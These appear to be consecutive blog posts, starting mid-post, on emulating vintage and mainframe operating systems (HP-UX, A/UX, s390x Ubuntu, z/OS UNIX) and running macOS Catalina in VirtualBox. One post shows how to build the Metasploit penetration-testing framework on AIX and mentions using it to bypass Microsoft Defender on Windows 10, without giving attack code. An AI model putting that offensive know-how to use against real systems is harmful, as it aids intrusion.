# ifconfig lan0
ifconfig: no such interface
# netstat -in
Name           Mtu Network            Address                 Ipkts      Opkts
lo0           4136 127.0.0.0          127.0.0.1                 166        166
# 

I will keep investigating this, since networking is an essential part of the whole simulation of HP-UX

Here are some notes I have gathered after the installation

To get rid of the annoying stuck message during boot process

NFS server (pid672@/net) not responding still trying

# /sbin/init.d/nfs.client stop
killing rpc.lockd
killing rpc.statd
killing biod
killing automount
# /sbin/init.d/nfs.server stop
# /sbin/init.d/nfs.core stop
stopping rpcbind

# cd /etc/rc.conf.d 
# ls -la nfs*
-r-xr--r-- 1 bin bin 2958 Apr 28 20:07 nfsconf
# 

Edit /etc/rc.confd.d/nfsconf  and change as follows

NFS_CLIENT=0
NFS_SERVER=0

Reboot

Here is a video demo of the HP-UX running under qemu

Apple A/UX was an early port of Unix to Apple’s 68k based Macintosh platform. It featured a full Unix system with a MacOS GUI and the ability to run classic MacOS applications. I have never heard of it until I have stumbled on it by accident on https://winworldpc.com/product/a-ux/3x 

Since I have not seen any Linux specific instructions on how to get this up and running (apart from Neozeed’s excellent articles here https://virtuallyfun.com/wordpress/category/aux/ ) this is a short howto to get one going.

We will be running a so called ShoeBill – it is an all-new, BSD-licensed Macintosh II emulator designed from the ground up with the singular goal of running A/UX.

Prerequisites

•  x86_64 Linux distribution (Im using Linux Mint 19.1 currently which is Ubuntu 18.04 based)
• A/UX package from https://winworldpc.com/product/a-ux/3x 
• macii.rom from here https://github.com/nyteshade/mini-vmac-setup/blob/master/MacII.ROM

Lets prepare the environment first for the build  (Either download the A/UX 3.0.0 or 3.0.1)

$ mkdir -p $HOME/AUX 
$ cd $HOME/AUX 
$ sudo su 
# apt-get install build-essential libsdl2-dev  uuid-dev p7zip-full wget git 
# exit 
$ 7z e 'Apple AUX 3.0.1.7z'
$ rm -rf 'Apple AUX 3.0.1' 'Apple AUX 3.0.1.7z'  'www.betaarchive.co.uk.info'
$ mv AUX_3.0.1_Install.iso aux.img 
$ wget https://github.com/nyteshade/mini-vmac-setup/raw/master/MacII.ROM

So lets pull the ShoeBill sources now and build it

$ cd $HOME/AUX
$ git clone https://github.com/pruten/shoebill.git
$ cd shoebill/sdl-gui
$ ./lin_build.sh

gcc -O3 -ggdb -flto adb.post.c fpu.post.c mc68851.post.c mem.post.c via.post.c floppy.post.c core_api.post.c cpu.post.c dis.post.c ../core/SoftFloat/softfloat.c ../core/atrap_tab.c ../core/coff.c ../core/exception.c ../core/macii_symbols.c ../core/redblack.c ../core/scsi.c ../core/video.c ../core/filesystem.c ../core/alloc_pool.c ../core/toby_frame_buffer.c ../core/ethernet.c ../core/sound.c sdl.c -lpthread -lm -lSDL2 -lGL -o shoebill
fpu.post.c: In function ‘_native_tentox’:
fpu.post.c:821:9: warning: type of ‘a’ defaults to ‘int’ [-Wimplicit-int]
 double  _native_tentox(a) {
         ^~~~~~~~~~~~~~
/tmp/cctaC1Cr.ltrans1.ltrans.o: In function `printf':
/usr/include/x86_64-linux-gnu/bits/stdio2.h:104: warning: `sys_errlist' is deprecated; use `strerror' or `strerror_r' instead

$ cp shoebill $HOME/AUX
$ cd $HOME/AUX

Now we are ready to run ShoeBill on Linux (networking TUN/TAP support does not currently work)

$ cd $HOME/AUX
$ ./shoebill rom=./Mac-II.ROM disk0=aux.img  width=1024 height=768 ram=64

And ShoeBill should boot (to release the mouse cursor simply press the right mouse button)

Since networking is not working we can use the following way how to transfer files to and from the system (copy the aux.img to aux2.img)

$ cd $HOME/AUX
$ cp aux.img aux2.img 
$ sudo su 
#  apt-get install hfsutils

# mkdir -p /mnt/disk
# losetup --find --show ./aux2.img
/dev/loop1
# partprobe /dev/loop1
# mount -t hfs -o rw /dev/loop1p3 /mnt/disk

This way we can delete some files on the /mnt/disk (free up about 10 MB space) 
And copy some files over once we unmount the drive, attach it to the emulator
and re-execute ShoeBill

# umount /mnt/disk 
# exit 
$ cd $HOME/AUX
$
$ ./shoebill rom=./Mac-II.ROM disk0=aux.img  disk1=aux2.img width=1024 height=768 ram=64

This is a dirty hack and Im not sure its really worth it :)

Qemu seems to be doing much better job at getting the latest virtio supported Linux builds for Big Iron ( Linux One  – For IBM System z series mainframes ) then the Hercules/Hyperion simulator (Although the latter can still run non-Linux stuff ) so this is an updated howto one year later from my previous s390x article https://astr0baby.wordpress.com/2018/06/03/installing-ubuntu-18-04-server-s390x-in-hercules-mainframe-simulator/

There are a few Linux distributions that have the major support from IBM on the z series and those are RHEL, SLES and Ubuntu. RHEL-8 beta s390x kernel panics during initial installation boot. SLES and Ubuntu work really well so you can try both, but I have rather chosen the more open Ubuntu instead.

Short entry on how to get this up and running. We are again using the bleeding edge qemu from git and a trusty x64_86 Linux distribution (I use Mint 19.1) Make sure your system can support min of 4 GB RAM for the qemu guest and has a sufficient CPU power (I have Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz )

$ mkdir -p $HOME/KVM/s390x/Ubuntu
$ cd $HOME/KVM/s390x/Ubuntu
$ git clone https://github.com/qemu/qemu.git
$ cd qemu 
$ ./configure --target-list=s390x-softmmu
$ make 

Copy the compiled qemu-system-hppa binary to your working directory

$ cd $HOME/KVM/s390x/Ubuntu
$./qemu-system-s390x --version 
QEMU emulator version 3.1.93 (v4.0.0-rc3-4-g13c24edaa7-dirty)
Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

Latest Ubuntu server builds are available here http://cdimage.ubuntu.com/ubuntu-server/daily/current/ so we will just wget the ISO

$ cd $HOME/KVM/s390x/Ubuntu 
$ mkdir iso 
$ wget http://cdimage.ubuntu.com/ubuntu-server/daily/current/eoan-server-s390x.iso
$ sudo su 
# mount -o loop eoan-server-s390x.iso ./iso 
# cd ./iso
# cat ubuntu.ins 
* Ubuntu for z Series (default kernel)
boot/kernel.ubuntu 0x00000000
boot/initrd.off 0x0001040c
boot/initrd.siz 0x00010414
boot/parmfile.ubuntu 0x00010480
boot/initrd.ubuntu 0x01000000

// Here we will copy from the mounted ISO the kernel and inintrd 

# cp boot/kernel.ubuntu ../
# cp boot/initrd.ubuntu ../ 

Next we prepare the virtual disk to which we will be installing the OS (6 GB is a minimum)

$ cd $HOME/KVM/s390x/Ubuntu
$ dd if=/dev/zero of=ubuntu.img bs=1024 count=6M

Next we make sure we have the “patched”  /etc/qemu-ifup  script in place

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

Next we need to make sure the qemu networking is setup (tun/tap and bridge)  Below is my network sharing script one needs to execute under root prior the emulation

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

We are going to use a virtual LAN 10.0.2.2/24  and assign our guest IP as 10.0.2.20 and gateway 10.0.2.2

And finally our install.sh script that will load the installation which needs to be executed under root

#!/bin/bash 
./qemu-system-s390x -machine s390-ccw-virtio -cpu max,zpci=on -serial telnet::4441,server -display none -m 4096 \
-net nic -net tap \
--cdrom eoan-server-s390x.iso \
-kernel kernel.ubuntu -initrd initrd.ubuntu \
-drive file=ubuntu.img,if=none,id=drive-virtio-disk0,format=raw,cache=none \
-device virtio-blk-ccw,devno=fe.0.0001,drive=drive-virtio-disk0,id=virtio-disk0,bootindex=1,scsi=off

We connect to the console via telnet (or any other capable terminal emulator) For the below screens Im using the cool-retro-terminal IBM 3278 profile to make it look more like a mainframe console.

 $ telnet localhost 4441

And if all went well the Ubuntu s390x will start to boot (The whole setup and installation can take about +- 2 hours)

Since the auto-configuration via DHCP will obviously fail, we will configure the network manually

Add 10.0.2.20 as IP

255.255.255.0 as netmask, and 10.0.2.2 as gateway IP

Nameserver (DNS) you can set 8.8.8.8 and setup a local hostname

Next we are asked for the remote SSH password for the installer session to which we will externally connect (so setup something)

And you get finally presented with login instructions to the remote installer (which we won’t really need since the installation will keep on going in the telnet console session)

Next we choose a language and location and the country mirror for the install-sets

The session will continue

After a few minutes (about 5) we get prompted to setup the users and passwords, confirm timezone ..

Next we will get to the disk setup stage, I just use entire disk

vda of course

And finally save all changes to that disk

Finally it will start the last stage of install (the longest one) so its time for tea or coffee since this will be the longest task of all (around 50 – 60  minutes)

Oh nice, we get a shiny new Linux Kernel 5.0.0 with the s390x current :)

Finally you might want to disable automatic updates (since this is lab stuff)

And just as I thought that we are done; another set of packages started to configure …

We get asked once more what other subset of packages we want, I chose none and will keep the core since we can always install the other stuff later

And yet more packages gets pulled from the net ..

And hopefully this is the last installation message

And now we need to wait a while for the whole thing to come down … be patient

To get to the end finally … (?)

Which will then kick to reboot

Congratulations, now you are running a mainframe Ubuntu 19.10 server on your laptop !

So we login and shutdown. Finally we prepare the following loader for the installation. Do not worry, now the system is quite snappy and the boot time on my system is 74 seconds !

#!/bin/bash
./qemu-system-s390x -machine s390-ccw-virtio -cpu max,zpci=on -serial telnet::4441,server -display none -m 4096 \
-net nic -net tap \
--cdrom eoan-server-s390x.iso \
-drive file=ubuntu.img,if=none,id=drive-virtio-disk0,format=raw,cache=none \
-device virtio-blk-ccw,devno=fe.0.0001,drive=drive-virtio-disk0,id=virtio-disk0,bootindex=1,scsi=off

A short entry here which might be of  help to whomever tries to run Metasploit framework on AIX and Power architecture. (I have not seen yet anybody mentioning this on the Internet)

I have done all this under qemu-system-ppc64 (how to run this under Qemu is described here in more detail https://astr0baby.wordpress.com/2018/11/04/running-aix-7-2-tl3sp1-on-x86_64-via-qemu-system-ppc64/) on my laptop which is perfect for tinkering and testing things before doing it on real hardware.  Make sure you use at least 4 GB of RAM for the qemu simulation, otherwise you will not be able to run metasploit (it will try forever to load ..)  Here is my qemu loader script

p.s.  There are some quirks with newer qemu-system-ppc64 builds and AIX 7.2. Version that Im using which works well is and thus I have named it qemu-system-ppc64-old

QEMU emulator version 3.0.50 (v3.0.0-614-g19b599f766-dirty)

./qemu-system-ppc64-old -cpu POWER8 -machine pseries -m 4096 -serial stdio -drive file=disk.img,if=none,id=drive-virtio-disk0 -device virtio-scsi-pci,id=scsi -device scsi-hd,drive=drive-virtio-disk0 -cdrom aix.iso -prom-env boot-command='boot disk: ' -net nic -net tap -display vnc=:1

First of all one needs to download some dependencies. I will include all the RPMs I have already installed in my system via yum from the Aixtoolbox public repo.

AIX-rpm
SDL
SDL-devel
SDL_mixer
SDL_ttf
SDL_ttf-devel
audiofile
audiofile-devel
autoconf
automake
bash
bzip2
bzip2-devel
ca-certificates
cmake
coreutils
cups
cups-libs
curl
cyrus-sasl
db
dbus
esound
esound-devel
expat
expat-devel
expect
flac
fontconfig
fontconfig-devel
freetype2
freetype2-devel
gcc
gcc-c++
gcc-cpp
gcc-go
gdbm
gdbm-devel
gettext
gettext-devel
glib
glib-devel
glib2
glib2-devel
gmp
gmp-devel
gnutls
grep
gtk+
info
less
libXft
libXft-devel
libXrandr
libXrender
libXrender-devel
libffi
libffi-devel
libgcc
libgcrypt
libgcrypt-devel
libgo
libgo-devel
libgpg-error
libgpg-error-devel
libiconv
libjpeg
libmikmod
libmpc
libogg
libogg-devel
libpcap
libpcap-devel
libpng
libpng-devel
libssh2
libssh2-devel
libstdc++
libstdc++-devel
libtasn1
libtool
libvorbis
libvorbis-devel
libxml2
libxml2-devel
libxml2-python
libxslt
libxslt-devel
lua
m4
mpfr
ncurses
ncurses-devel
nettle
nmap
openldap
p11-kit
patch
pcre
pcre-devel
perl
pkg-config
postgresql
postgresql-devel
postgresql-libs
pth
pysqlite
python
python-cryptography
python-devel
python-iniparse
python-passlib
python-pyasn1
python-pycurl
python-six
python-tools
python-urlgrabber
python3
readline
readline-devel
renderproto
rsync
sed
smpeg
smpeg-libs
sqlite
sqlite-devel
tar
tcl
tcsh
tightvnc-server
tk
unzip
wget
xz
xz-devel
xz-libs
yum
yum-metadata-parser
zlib
zlib-devel

Since the ruby-2.5.1 and ruby-devel-2.5.1 RPMs that come from the https://public.dhe.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/ruby/   don’t work in compiling any gems that Metasploit is dependant upon, I have chosen to build Ruby from source on AIX. It not hard and is a pretty straight forward task (we will install into /usr/local prefix to keep the /opt/freeware separate)

In this example I have used Ruby 2.5.1 version to shadow the Aixtoolbox one, but you can do the same with 2.5.5 or 2.6.3

$ wget https://cache.ruby-lang.org/pub/ruby/2.5/ruby-2.5.1.tar.gz
$ tar -zxvf ruby-2.5.1.tar.gz
$ cd ruby-2.5.1
$ ./configure
$ make
$ su - 
# make install

Once we have Ruby installed (make sure to include /usr/local to your profile) we can move on to downloading a Metasploit snapshot from git. I chose to get the ZIP snapshot, simply because its faster under the ppc64 simulator

$ wget  https://github.com/rapid7/metasploit-framework/archive/master.zip
$ unzip master.zip 
$ cd metasploit-framework-master

Next step would be to run bunlde install in the metasploit directory, but we will skip this for now, because there are 2 gems we need to customize locally and patch in order to compile and  build them on AIX 7.2  These are

nokogiri-1.10.3.gem
bcrypt-3.1.13

Since nokogiri the most important and downloaded Ruby gem of all times, it does not build on AIX due to the missing vasprintf() function which is not POSIX and is not present in the C library in AIX, the gem builds and compiles if you do not modify the build procedure, but the final library does not work and bails with following error

bash-5.0# /usr/local/bin/gem install nokogiri-1.10.3.gem
Building native extensions. This could take a while...
Successfully installed nokogiri-1.10.3
Parsing documentation for nokogiri-1.10.3
Done installing documentation for nokogiri after 49 seconds
1 gem installed
bash-5.0# /usr/local/bin/nokogiri
Traceback (most recent call last):
8: from /usr/local/bin/nokogiri:23:in <main>' 7: from /usr/local/bin/nokogiri:23:in load' 6: from /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/bin/nokogiri:6:in <top (required)>' 5: from /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in require' 4: from /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in require' 3: from /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri.rb:28:in <top (required)>' 2: from /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri.rb:32:in rescue in <top (required)>' 1: from /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in require' /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': load failed - /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogir.so. Please issue below command for detailed reasons: (LoadError) /usr/sbin/execerror ruby "(ld 3 1 vasprintf /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogiri.so"

When we check the detailed error by running the suggested command we get more details

bash-5.0# /usr/sbin/execerror ruby 
"(ld 3 1 vasprintf /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogiri.so"
exec(): 0509-036 Cannot load program ruby because of the following errors:
rtld: 0712-001 Symbol vasprintf was referenced from module
/usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogiri.so(),
but a runtime definition of the symbol was not found.

So vasprintf symbol is missing and is being called. Well we will need to hack through the gem to get it to build on AIX 7.2 then. Luckily its not that hard.

Lets create a working directory for our Ruby gem dissection experiments and download the nokogiri one.

$ mkdir GEMS
$ cd GEMS
$ gem fetch nokogiri 
Fetching: nokogiri-1.10.3.gem (100%)
Downloaded nokogiri-1.10.3
$ gem spec nokogiri-1.10.3.gem --ruby > nokogiri.gemspec
$ gem unpack nokogiri-1.10.3.gem
Unpacked gem: '/home/root/LOCAL-GEMS/TT/nokogiri-1.10.3'
$ mv nokogiri.gemspec nokogiri-1.10.3
$ cd  nokogiri-1.10.3
$ cd ext/nokogiri

Now we will modify the extconf.rb file to include build procedure to make a working nokogiri.so shared library on AIX  and locate the following   under nix? $CFLAGS <<

And change to

$CFLAGS << " -DXP_WIN -DXP_WIN32 -DUSE_INCLUDED_VASPRINTF "

Save and return to building nokogiri gem

$ cd ../.. 
$ gem build nokogiri.gemspec 
WARNING:  ports/archives/libxml2-2.9.9.tar.gz is not world-readable
WARNING:  ports/archives/libxslt-1.1.33.tar.gz is not world-readable
WARNING:  no homepage specified
WARNING:  pessimistic dependency on mini_portile2 (~> 2.4.0) may be overly strict
  if mini_portile2 is semantically versioned, use:
    add_runtime_dependency 'mini_portile2', '~> 2.4', '>= 2.4.0'
WARNING:  pessimistic dependency on racc (~> 1.4.14, development) may be overly strict
  if racc is semantically versioned, use:
    add_development_dependency 'racc', '~> 1.4', '>= 1.4.14'
WARNING:  pessimistic dependency on rake-compiler (~> 1.0.3, development) may be overly strict
  if rake-compiler is semantically versioned, use:
    add_development_dependency 'rake-compiler', '~> 1.0', '>= 1.0.3'
WARNING:  pessimistic dependency on rexical (~> 1.0.5, development) may be overly strict
  if rexical is semantically versioned, use:
    add_development_dependency 'rexical', '~> 1.0', '>= 1.0.5'
WARNING:  See http://guides.rubygems.org/specification-reference/ for help
  Successfully built RubyGem
  Name: nokogiri
  Version: 1.10.3
  File: nokogiri-1.10.3.gem

$ su 
# gem install  nokogiri-1.10.3.gem

After some time it will eventually build (under qemu its slow) and we can check to see if the final nokogiri gem actually works by executing the gem itself

$ /usr/local/bin/nokogiri  --version
# Nokogiri (1.10.3)
    ---
    warnings: []
    nokogiri: 1.10.3
    ruby:
      version: 2.5.1
      platform: powerpc-aix7.2.0
      description: ruby 2.5.1p57 (2018-03-29 revision 63029) [powerpc-aix7.2.0]
      engine: ruby
    libxml:
      binding: extension
      source: packaged
      libxml2_path: "/usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/ports/powerpc-ibm-aix7.2.3.0/libxml2/2.9.9"
      libxslt_path: "/usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/ports/powerpc-ibm-aix7.2.3.0/libxslt/1.1.33"
      libxml2_patches:
      - 0001-Revert-Do-not-URI-escape-in-server-side-includes.patch
      - 0002-Remove-script-macro-support.patch
      - 0003-Update-entities-to-remove-handling-of-ssi.patch
      libxslt_patches:
      - 0001-Fix-security-framework-bypass.patch
      compiled: 2.9.9
      loaded: 2.9.9

Now lets move onto the last gem bcrytp; the problem with it is as follows – when running gem install bcrypt we get the floowing error on AIX 7.2

$ gem install bcrypt

# gem install bcrypt 
Fetching: bcrypt-3.1.13.gem (100%)
Building native extensions. This could take a while...
ERROR:  Error installing bcrypt:
        ERROR: Failed to build gem native extension.

    current directory: /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13/ext/mri
/usr/local/bin/ruby -r ./siteconf20190624-6029732-1f0poah.rb extconf.rb
creating Makefile

current directory: /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13/ext/mri
make "DESTDIR=" clean

current directory: /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13/ext/mri
make "DESTDIR="
compiling bcrypt_ext.c
compiling crypt_blowfish.c
compiling crypt_gensalt.c
compiling wrapper.c
linking shared-object bcrypt_ext.so
gcc: error: x86.o: No such file or directory
make: 1254-004 The error code from the last command is 1.

Stop.

make failed, exit code 2

Gem files will remain installed in /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13 
for inspection.
Results logged to /usr/local/lib/ruby/gems/2.5.0/extensions/powerpc-aix-7/2.5.0-static/bcrypt-3.1.13/gem_make.out

So yet again some strangeness with x86.o object file on ppc64 AIX platform … this time the fix is easy as well, lets repeat the exercise and fetch the gem and modify the build procedure

$ gem fetch bcrypt 
Fetching: bcrypt-3.1.13.gem (100%)
Downloaded bcrypt-3.1.13
$ gem spec bcrypt-3.1.13.gem --ruby > bcrypt.gemspec
$ gem unpack bcrypt-3.1.13.gem
$ mv bcrypt.gemspec bcrypt-3.1.13 
$ cd bcrypt-3.1.13
$ cd ext/mri

Lets edit the extconf.rb again and remove the x86 reference

Delete the x86.o save and rebuild the gem again

$ cd ../.. 
$ gem build bcrypt.gemspec
WARNING:  open-ended dependency on rspec (>= 3, development) is not recommended
  if rspec is semantically versioned, use:
    add_development_dependency 'rspec', '~> 3'
WARNING:  See http://guides.rubygems.org/specification-reference/ for help
  Successfully built RubyGem
  Name: bcrypt
  Version: 3.1.13
  File: bcrypt-3.1.13.gem

$ su 
# gem install bcrypt-3.1.13.gem
Building native extensions. This could take a while...
Successfully installed bcrypt-3.1.13
Parsing documentation for bcrypt-3.1.13
Installing ri documentation for bcrypt-3.1.13
Done installing documentation for bcrypt after 26 seconds
1 gem installed

Now we should be all set to install the missing gems needed for Metasploit framework so just run bundle install from the metasploit root directory

$ cd metasploit-framework-master
$ bundle install

Make some coffee/tea as this will take some time … I went outside to see the world around me

So now we are ready to run Metasploit Framework on AIX 7.2 ? Yes we are !

we can run ./msfconsole and hope all works (again this takes some time under qemu)

And even do some live test against up2date Windows 10 1903 (10.0.18362.175)  and bypass MS Defender while we are at it ;)

And a video demonstration of how it runs/works on AIX against Win10

Accessing the UNIX shell from the z/OS TSO session is really simple and it was the only thing I really wanted to see.  I will only highlight some point of interest from the UNIX perspective here, like the shell environment, structure, commands and compilers. We will build a simple C program in the end.

So once we login via TSO

In the menu we will select option 6 [Command]   <ENTER>

And enter the TSO command OMVS

ROGERS @ SC43:/>ls -al /u/rogers
total 408
drwx------  3 ADMIN   SYS1           8192 Aug  1 2005  .
dr-xr-xr-x 93 AAAAAAA TTY               0 Feb 13 11:14 ..
-rwxr-xr-x  1 ADMIN   SYS1            979 Feb 29 1996  .profile
-rw-------  1 ADMIN   SYS1             29 Mar  1 1996  .sh_history
-rw-r--r--  1 AAAAAAA SYS1          84543 Apr 28 2007  Sc.pdf
drwxr-xr-x  2 AAAAAAA SYS1           8192 Jun 25 2001  data
-rw-r--r--  1 AAAAAAA SYS1          47848 Jun 26 2004  inventory.export
-rwx------  1 AAAAAAA SYS1             16 Aug  1 2005  myfile
-rw-r--r--  1 AAAAAAA SYS1          43387 Jun 22 2007  print.export

So we will end up with the following screen

One important thing to understand here is the prompt at the bottom of the x3270 terminal

===> this is were all the commands go   (it is slightly weird to get used to )

We can run stuff like “id , whoami, env … ”

Check the process tree via ps

the filesystem is not complex and is quite simple realy, most system binaries reside in /bin, /usr/sbin and /usr/lpp   as we can see from the above screenshot

Even Java is there (in this example it is an aged version of z/OS)

sshd and all the related programs are available (again aged in this version)

And of course some C compilers

And finally a small test to compile a simplest of C programs … unfortunately I could not figure out how to define the x3270 terminal for the vi editor so I have used ed instead.

Ed is a single line editor which you can use in emergencies like this :)

Short entry here how to get the latest macOS running inside the VirtualBox on your Linux machine (x86_64 Intel) We will need the following :

• Linux x86_64 (Im using Mint 19.1) Intel Core CPU with at least 8 GB RAM and a decent fast SSD drive
• VirtualBox (current 6.0.8)
• macOS Catalina install ISO (vanilla)
• Clover.iso
• Extra USB mouse (for USB pass-through in VirtualBox)

I have prepared Clover for 1280×1024 resolution, both SIP enabled or SIP disabled versions, and the whole howto will be about running Catalina in 1280×1024 (If you want to change this you should read the customizing Clover article here -> https://astr0baby.wordpress.com/2019/01/19/customizing-the-clover-iso-mojave-loader/

SIP-Enabled 1280×1024 Clover.iso can be downloaded here -> https://mega.nz/#!S4MAhQoZ!nrAKce_AFhxZLm21sIjwHFpeFw6dW7Salpvs50tywYg

SIP-Disabled 1280×1024 Clover.iso can be downloaded here -> https://mega.nz/#!upc21CaT!wCUnzknVODKmbwrC6NCH4engMKU7YpMyn9ezguwwx4A

Catalina-Beta iso can be downloaded here  -> https://gofile.io/?c=MmX49O

Once we have these files downloaded, lets prepare the VirtualBox Catalina environment. First we need to create a new VM with the following values; remember make sure you use big enough VDI disk around 50GB and follow the below instructions ..

I am using static IPs for my VMs and separate VLANs so you can change this as you like, the networking script is included below which needs to be executed before the VM starts and only when the vboxnet0 interface is loaded ! (usually after you start VirtualBox)

Here we are using a little trick to fix the “cannot move windows in Catalina VM” if you just use the native VirtualBox mouse, so we will plug in a real secondary USB mouse and add it to USB Device Filters so that the VM can use this directly.

After you create your Catalina VirtualBox environment (make sure you follow the above screenshots correctly, otherwise it won’t work) we will apply the following shellscript to the VirtualBox Catalina Guest (save it as catalina.sh, chmod +x and execute it)

#!/bin/bash
readonly VM_RES="1280x1024"
readonly NAME="Catalina"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

NETWORK:

Here is my networking script I use (adjust to your needs) you will need the uml-utilities and bridge-utils ( on Debian/Ubuntu just run sudo apt–get install uml-utilities bridge-utils)

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Next we will boot Catalina.iso normally via VirtualBox and get to the first stage macOS installer and erase the disk with and create APFS partition and install. .. Again this is exactly same like the previous Mojave install ( you can see the details here https://astr0baby.wordpress.com/2018/09/25/running-macos-mojave-10-14-on-virtualbox-5-2-18-on-linux-x86_64/ )

Once the 1st stage installer finishes (takes about 5 – 10 minutes) system will go for reboot, wait for it to do the cycle and when it comes back up again to the same installer just shut down the VM and replace the ISO from Catalina.iso to the Clover.iso we have downloaded earlier, this step is needed because the new drive is partitioned with APFS and current VirtualBox UEFI cannot see it. Clover.iso has these so we must use it as a bootloader every time we want to run Catalina in VirtualBox.

Next boot Catalina again with Clover.iso in place and select the Installer partition (move the arrow keys – mouse does not work there) and enter for confirmation.

Next 2nd installer stage will take considerably longer (around 30 minutes on a good SSD driver) so be patient. Once that is done the system will yet go for a reboot (if it gets stuck just hard-reset and boot again)

We boot Catalina again from VirtualBox (if you see errors on screen, shut down the VM and start again, this occasionally happens) and wait for the final user setup, network stuff etc.

For networking Im using a following setup (change accordingly if you wish to use other values)

IP 10.0.2.12   NetMask  255.255.255.0  GW: 10.0.2.2  DNS 8.8.8.8

We should be done and Catalina is up and online …

Now you will observer that there will be two mice usable, for working inside the Catalina guest, use the USB mouse we chose in USB Pass-through in VirtualBox

P.S in the scaled mode the Clover menu does not work well for some reason and one cannot move the arrow keys to select boot, so do not use scaled mode when booting Catalina, you can change it immediately afterwards to scaled mode after you boot it)

Updates work well, you just need to select the installer partition in Clover next time macOS gets a system update, which again takes some time to install.  As of now you can see there is a 3rd Beta already released  https://developer.apple.com/news/releases/?id=07022019e